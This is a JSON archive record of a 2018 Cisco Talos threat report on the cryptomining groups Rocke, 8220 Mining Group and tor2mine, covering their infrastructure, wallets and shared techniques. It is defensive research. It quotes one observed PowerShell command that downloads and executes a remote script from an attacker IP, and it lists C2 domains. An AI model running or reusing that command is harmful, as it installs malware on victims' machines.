{
	"id": "2ebdeedf-ff32-4fca-861b-fd22cc9ae865",
	"created_at": "2026-04-06T00:13:05.904141Z",
	"updated_at": "2026-04-10T13:11:19.821189Z",
	"deleted_at": null,
	"sha1_hash": "d889f8ed2f6a73de74d4c8ec846a60281b64c951",
	"title": "Connecting the dots between recently active cryptominers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 560703,
	"plain_text": "Connecting the dots between recently active cryptominers\r\nBy Nick Biasini\r\nPublished: 2018-12-18 · Archived: 2026-04-05 14:28:28 UTC\r\nTuesday, December 18, 2018 11:33\r\nPost authored by David Liebenberg and Andrew Williams.\r\nExecutive Summary Through Cisco Talos' investigation of illicit cryptocurrency mining campaigns in the\r\npast year, we began to notice that many of these campaigns shared remarkably similar TTPs, which we at\r\nfirst mistakenly interpreted as being attributed to a single actor. However, closer analysis revealed that a\r\nspate of illicit mining activity over the past year could be attributed to several actors that have netted them\r\nhundreds of thousands of U.S. dollars combined.\r\nThis blog examines these actors' recent campaigns, connects them to other public investigations and examines\r\ncommonalities among their toolsets and methodologies.\r\nWe will cover the recent activities of these actors:\r\nRocke —A group that employs Git repositories, HTTP FileServers (HFS), and Amazon Machine Images in their\r\ncampaigns, as well as a myriad of different payloads, and has targeted a wide variety of servers, including Apache\r\nStruts2, Jenkins and JBoss.\r\n8220 Mining Group —Active since 2017, this group leverages Pastebin sites, Git repositories and malicious Docker\r\nimages. The group targets Drupal, Hadoop YARN and Apache Struts2.\r\nTor2Mine —A group that uses tor2web to deliver proxy communications to a hidden service for command and\r\ncontrol (C2). 
These groups have used similar TTPs, including:\r\nMalicious shell scripts masquerading as JPEG files with the name \"logo*.jpg\" that install cron jobs and download\r\nand execute miners.\r\nThe use of variants of the open-source miner XMRig intended for botnet mining, with versions dependent on the\r\nvictim's architecture.\r\nScanning for and attempting to exploit recently published vulnerabilities in servers such as Apache Struts2, Oracle\r\nWebLogic and Drupal.\r\nMalicious scripts and malware hosted on Pastebin sites, Git repositories and domains with .tk TLDs.\r\nhttps://blog.talosintelligence.com/cryptomining-campaigns-2018/\r\nPage 1 of 13\n\nTools such as XHide Process Faker, which can hide or change the name of Linux processes, and PyInstaller, which\r\ncan convert Python scripts into executables.\r\nWe were also able to link these groups to other published research that\r\nhad not always been linked to the same actor. These additional campaigns demonstrate the breadth of exploitation\r\nactivity that illicit cryptocurrency mining actors engaged in.\r\nThe recent decline in the value of cryptocurrency is sure to affect the activities of these adversaries. For instance, Rocke\r\nbegan developing destructive malware that posed as ransomware, diversifying their payloads as a potential response to\r\ndeclining cryptocurrency value. This was a trend that the Cyber Threat Alliance had predicted in their 2018 white paper on\r\nthe illicit cryptocurrency threat. However, activity on Git repositories connected to the actors demonstrates that their interest\r\nin illicit cryptocurrency mining has not completely abated. 
Talos published separate research today covering this trend.\r\nTimeline of actors' campaigns\r\nTimeline of Activity\r\nIntroduction\r\nIllicit cryptocurrency mining remained one of the most common threats Cisco Talos observed in 2018.\r\nThese attacks steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the\r\nthreat actor. Campaigns delivering mining malware can also compromise the victim in other ways, such as by\r\ndelivering remote access trojans (RATs) and other malware.\r\nThrough our investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many shared\r\nremarkably similar TTPs, which we at first mistakenly interpreted as being attributed to a single actor. After completing\r\nanalysis of these attacks' wallets and command and control (C2) servers, we discovered that a spate of illicit mining activity\r\nover the past year could be attributed to several actors. This illustrates the prevalent use of tool sharing or copying in illicit\r\nmining.\r\nWe also observed that, by examining these groups' infrastructure and wallets, we were able to connect them to other\r\npublished research that had not always been related to the same actor, which demonstrated the breadth of exploitation\r\nactivity that illicit cryptocurrency mining actors engaged in.\r\nWe first started tracking these groups when we began monitoring a prolific actor named Rocke and noticed that several other\r\ngroups were using similar TTPs.\r\nWe began following the activities of another prolific actor through a project forked on GitHub by Rocke: the 8220 Mining\r\nGroup. 
We also noticed a similar toolset being used by an actor we named \"tor2mine,\" based on the fact that they\r\nadditionally used tor2web services for C2 communications.\r\nWe also discovered some actors that share similarities to the aforementioned groups, but we could not connect them via\r\nnetwork infrastructure or cryptocurrency wallets. Through investigating all these groups, we determined that combined, they\r\nhad made hundreds of thousands of dollars in profits.\r\nRocke/Iron cybercrime group\r\nCisco Talos wrote about Rocke earlier this year, an actor linked to the Iron Cybercrime\r\ngroup that actively engages in distributing and executing cryptocurrency mining malware using a varied toolkit that\r\nincludes Git repositories, HTTP FileServers (HFS), and a myriad of different payloads, including shell scripts,\r\nJavaScript backdoors, as well as ELF and PE miners. Talos first observed this actor when they attacked our\r\nhoneypot infrastructure.\r\nIn the campaigns we discussed, Rocke targeted vulnerable Apache Struts2 servers in the spring and summer of 2018.\r\nThrough tracking the actor's wallets and infrastructure, we were able to link them to some additional exploit activity that was\r\nreported on by other security firms but in most instances was not attributed to one actor. Through examining these\r\ncampaigns that were not previously linked, we observed that Rocke has also targeted Jenkins and JBoss servers, continuing\r\nto rely on malicious Git repositories, as well as malicious Amazon Machine Images. They have also been expanding their\r\npayloads to include malware with worm-like characteristics and destructive ransomware capabilities. Several campaigns\r\nused the XHide Process Faker tool.\r\nWe have since discovered additional information that suggests that Rocke has been continuing this exploit activity. 
Since\r\nearly September, we have observed Rocke exploiting our Struts2 honeypots to download and execute files from their C2\r\nssvs[.]space. Beginning in late October, we observed this type of activity in our honeypots involving another Rocke C2 as\r\nwell: sydwzl[.]cn.\r\nThe dropped malware includes ELF (Executable and Linkable Format) backdoors, bash scripts to download and execute\r\nother malware from Rocke C2s, as well as illicit ELF Monero miners and associated config files.\r\nWhile keeping an eye on honeypot activity related to Rocke, we have continued to monitor their GitHub account for new\r\nactivity. In early October, Rocke forked a repository called whatMiner, developed by a Chinese-speaking actor. WhatMiner\r\nappears to have been developed by another group called the 8220 Mining Group, which we will discuss below. The readme\r\nfor the project describes it as \"collecting and integrating all different kinds of illicit mining malware.\"\r\nGit repository for whatMiner\r\nLooking at some of the bash scripts in the repository, it appears that they scan for and\r\nexploit vulnerable Redis and Oracle WebLogic servers to download and install Monero miners. The scripts also rely\r\non a variety of Pastebin pages with Base64-encoded scripts in them that download and execute miners and backdoors\r\nonto the victim's machines. These malicious scripts and malware masquerade as JPEG files and are hosted on the\r\nChinese-language file-sharing site thyrsi[.]com. The only difference in Rocke's forked version is that they replaced\r\nthe Monero wallet in the config file with a new one.\r\nWhile looking through this repository, we found a folder called \"sustes.\" There were three samples in this folder: mr.sh, a\r\nbash script that downloads and installs an illicit Monero miner; xm64, an illicit Monero miner; and wt.conf, a config file for\r\nthe miner. 
These scripts and malware very closely match the ones we found in our honeypots with the same file names,\r\nalthough the bash script and config file were changed to include Rocke's infrastructure and their Monero wallet.\r\nMany of the samples obtained in our honeypots reached out to the IP 118[.]24[.]150[.]172 over TCP. Rocke's C2,\r\nsydwzl[.]cn, also resolves to this IP, as did the domain sbss[.]f3322[.]net, which began experiencing a spike in DNS requests\r\nin late October. Two samples with high detection rates submitted to VirusTotal in 2018 made DNS requests for both\r\ndomains. Both samples also made requests for a file called \"TermsHost.exe\" from an IP 39[.]108[.]177[.]252, as well as a\r\nfile called \"xmr.txt\" from sydwzl[.]cn. In a previous Rocke campaign, we observed a PE32 Monero miner sample called\r\n\"TermsHost.exe\" hosted on their C2 ssvs[.]space and a Monero mining config file called \"xmr.txt\" on the C2 sydwzl[.]cn.\r\nWhen we submitted both samples in our ThreatGrid sandbox, they did not make DNS requests for sydwzl[.]cn, but did make\r\nGET requests for hxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408. The resulting download\r\nis an HTML text file of a 301 error message. When we looked at the profile for the user 979040408@qq.com, we observed\r\nthat they had numerous posts related to Chinese-language hacking and exploit forums, as well as advertisements for\r\ndistributed denial-of-service (DDoS) services.\r\nNote that Rocke activity tapered off towards the end of the year. Security researchers at Chinese company Alibaba have\r\ntaken down Rocke infrastructure that was hosted on Alibaba Cloud. 
In addition, there has not been activity on Rocke's\r\nGitHub since November, nor have we seen related samples in our honeypots since that time.\r\n8220 Mining Group\r\nAs we previously described, Rocke originally forked a repository called \"whatMiner.\" We\r\nbelieve this tool is linked to another Chinese-speaking, Monero-mining threat actor — 8220 Mining Group — due to\r\nthe repository's config files' default wallet and infrastructure. Their C2s often communicate over port 8220, earning\r\nthem the 8220 Mining Group moniker. This group uses some similar TTPs to Rocke.\r\nWe first observed the 8220 Mining Group in our Struts2 honeypots in March 2018. Post-exploitation, the actor would issue a\r\ncURL request for several different types of malware on their infrastructure over port 8220. The dropped malware included\r\nELF miners, as well as their associated config files with several of 8220 Mining Group's wallets entered in the appropriate\r\nfields. This is an example of the type of commands we observed:\r\nWe were able to link the infrastructure and wallets observed in the attacks against our honeypots, as well as in the Git\r\nrepository, with several other campaigns that the 8220 Mining Group is likely responsible for.\r\nThese campaigns illustrate that beyond exploiting Struts2, 8220 Mining Group has also exploited the Drupal content\r\nmanagement system, Hadoop YARN, Redis, WebLogic and CouchDB. Besides leveraging malicious bash scripts, Git\r\nrepositories and image sharing services, as in whatMiner, 8220 Mining Group also carried out a long-lasting campaign using\r\nmalicious Docker images. 8220 Mining Group was able to amass nearly $200,000 worth of Monero through their\r\ncampaigns.\r\nThere were some similarities between the TTPs used by Rocke and 8220 Mining Group in these campaigns. 
The actors\r\ndownloaded a malicious file \"logo*.jpg\" (very similar to Rocke's use of malicious scripts under the file name of \"logo*.jpg\"\r\npayloads), which gets executed through the bash shell to deliver XMRig. The actor also employed malicious scripts hosted\r\non .tk TLDs, Pastebin sites, and Git repositories, which we have also observed Rocke employing.\r\ntor2mine\r\nOver the past few years, Talos has been monitoring accesses to tor2web services, which serve as a bridge\r\nbetween the internet and the Tor network, a system that allows users to enable anonymous communication. These\r\nservices are useful for malware authors because they eliminate the need for malware to communicate with the Tor\r\nnetwork directly, which is suspicious and may be blocked, and allow the C2 server's IP address to be hidden.\r\nRecently, while searching through telemetry data, we observed malicious activity that leveraged a tor2web gateway to proxy\r\ncommunications to a hidden service for a C2: qm7gmtaagejolddt[.]onion[.]to.\r\nIt is unclear how the initial exploitation occurs, but at some point in the exploitation process, a PowerShell script is\r\ndownloaded and executed to install follow-on malware onto the system:\r\nC:\\\\Windows\\\\System32\\\\cmd.exe /c powershell.exe -w 1 -NoProfile -InputFormat None -ExecutionPolicy\r\nBypass -Command iex ((New-Object\r\nSystem.Net.WebClient).DownloadString('hxxp://107[.]181[.]187[.]132/v1/check1.ps1'))\r\nWe identified additional malware on this IP, which belongs to Total Server Solutions LLC. They appear to include 64-bit and\r\n32-bit variants of XMRigCC (a variant of the XMRig miner), Windows executable versions of publicly available\r\nEternalBlue/EternalRomance exploit scripts, an open-source TCP port scanner, and shellcode that downloads and executes a\r\n
Additional scripts leverage JavaScript, VBScript, PowerShell and batch scripts to avoid\r\nwriting executables to the disk.\r\nWe began to research the malware and infrastructure used in this campaign. We observed previous research on a similar\r\ncampaign. This actor was exploiting CVE-2018-11776, an Apache Struts 2 namespace vulnerability. The actor also relied on\r\nan IP hosted on Total Server Solutions LLC (107[.]181[.]160[.]197). They also employed a script, \"/win/checking-test.hta,\"\r\nthat was almost identical to one we saw hosted on the tor2mine actors C2, \"check.hta:\"\r\n/win/checking-test.hta from previous campaign\r\ncheck.hta\r\nThis actor dropped XMRigCC as a payload, mining to eu[.]minerpool[.]pw, as well. Both campaigns additionally relied on\r\nthe XHide Process-faker tool.\r\nSimilarly, in February 2018, Trend Micro published a report on an actor exploiting an Oracle WebLogic WLS-WSAT\r\nvulnerability to drop 64-bit and 32-bit variants of XMRig. The actors used many similar supporting scripts that we observed\r\nduring the tor2web campaigns, and also used a C2 hosted on Total Server Solutions LLC (hxxp://107[.]181[.]174[.]248).\r\nThey also mined to eu[.]minerpool[.]pw.\r\nThis malware was developed in Python and then changed to ELF executables using the PyInstaller tool for distribution. This\r\nis the same technique we observed in a Rocke campaign.\r\nConclusion Through tracking the wallets of these groups, we estimate that they hold and have made payments\r\ntotaling around 1,200 Monero. Based on public reporting, these groups combined had earned hundreds of thousands\r\nof dollars worth of cryptocurrency. However, it is difficult to ascertain the exact amount they made since the value of\r\nMonero is very volatile and it is difficult to tell the value of the currency when it was sold. 
We were also unable to\r\ntrack holdings and payments for certain kinds of wallets, such as MinerGate.\r\nThe value of Monero has dramatically declined in the past few months. Talos has observed less activity from these actors in\r\nour honeypots since November, although cryptocurrency-focused attacks from other actors continue.\r\nThere remains the possibility that with the value of cryptocurrencies so low, threat actors will begin delivering different\r\nkinds of payloads. For example, Rocke has been observed developing new malware with destructive capabilities that poses as\r\nransomware. However, Rocke's GitHub page shows that, as of early November, they were continuing to fork mining-focused repositories, including a static build of XMRig.\r\nTalos will continue to monitor these groups, as well as cryptocurrency mining-focused attacks in general, to assess what\r\nchanges, if any, arise from the decline in value of cryptocurrencies.\r\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.\r\nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites\r\nand detects malware used in these attacks.\r\nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System\r\n(NGIPS), and Meraki MX can detect malicious activity associated with this threat.\r\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether\r\nusers are on or off the corporate network.\r\nOpen Source SNORT® Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for\r\npurchase on Snort.org.\r\nIOCs\r\nRocke 
IPs, domains, URLs, SHA-256 hashes and wallets, followed by those of 8220 Gang, Tor2mine and uncategorized groups, are listed in the source report.\r\nSource: https://blog.talosintelligence.com/cryptomining-campaigns-2018/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.talosintelligence.com/cryptomining-campaigns-2018/"
	],
	"report_names": [
		"cryptomining-campaigns-2018"
	],
	"threat_actors": [
		{
			"id": "7c053836-8f50-4d40-bc5c-7088967e1b57",
			"created_at": "2022-10-25T16:07:24.549525Z",
			"updated_at": "2026-04-10T02:00:05.03048Z",
			"deleted_at": null,
			"main_name": "Rocke",
			"aliases": [
				"Aged Libra",
				"G0106",
				"Iron Group",
				"Rocke"
			],
			"source_name": "ETDA:Rocke",
			"tools": [
				"Godlua",
				"Kerberods",
				"LSD",
				"Pro-Ocean",
				"Xbash"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "0b8ea9bb-b729-438a-ae1f-4240db936fd7",
			"created_at": "2023-06-23T02:04:34.839947Z",
			"updated_at": "2026-04-10T02:00:04.99239Z",
			"deleted_at": null,
			"main_name": "8220 Gang",
			"aliases": [
				"8220 Mining Group",
				"Returned Libra",
				"Water Sigbin"
			],
			"source_name": "ETDA:8220 Gang",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "905eabd9-2b7f-483d-86bd-0c72f96b4162",
			"created_at": "2023-01-06T13:46:39.02749Z",
			"updated_at": "2026-04-10T02:00:03.185957Z",
			"deleted_at": null,
			"main_name": "Rocke",
			"aliases": [
				"Aged Libra"
			],
			"source_name": "MISPGALAXY:Rocke",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "942c5fbc-31df-4aef-8268-e3ccf6692ec8",
			"created_at": "2024-07-09T02:00:04.434476Z",
			"updated_at": "2026-04-10T02:00:03.671196Z",
			"deleted_at": null,
			"main_name": "Water Sigbin",
			"aliases": [
				"8220 Gang"
			],
			"source_name": "MISPGALAXY:Water Sigbin",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "0b02af5f-2027-42b7-a6f2-51e2fd49ba7f",
			"created_at": "2022-10-25T15:50:23.360509Z",
			"updated_at": "2026-04-10T02:00:05.337702Z",
			"deleted_at": null,
			"main_name": "Rocke",
			"aliases": [
				"Rocke"
			],
			"source_name": "MITRE:Rocke",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "7618565f-b8b8-4e33-b25e-3e89fdc444dd",
			"created_at": "2023-01-06T13:46:39.434955Z",
			"updated_at": "2026-04-10T02:00:03.326016Z",
			"deleted_at": null,
			"main_name": "Returned Libra",
			"aliases": [
				"8220 Mining Group"
			],
			"source_name": "MISPGALAXY:Returned Libra",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31",
			"created_at": "2023-01-06T13:46:38.376868Z",
			"updated_at": "2026-04-10T02:00:02.949077Z",
			"deleted_at": null,
			"main_name": "Cleaver",
			"aliases": [
				"G0003",
				"Operation Cleaver",
				"Op Cleaver",
				"Tarh Andishan",
				"Alibaba",
				"TG-2889",
				"Cobalt Gypsy"
			],
			"source_name": "MISPGALAXY:Cleaver",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434385,
	"ts_updated_at": 1775826679,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d889f8ed2f6a73de74d4c8ec846a60281b64c951.pdf",
		"text": "https://archive.orkl.eu/d889f8ed2f6a73de74d4c8ec846a60281b64c951.txt",
		"img": "https://archive.orkl.eu/d889f8ed2f6a73de74d4c8ec846a60281b64c951.jpg"
	}
}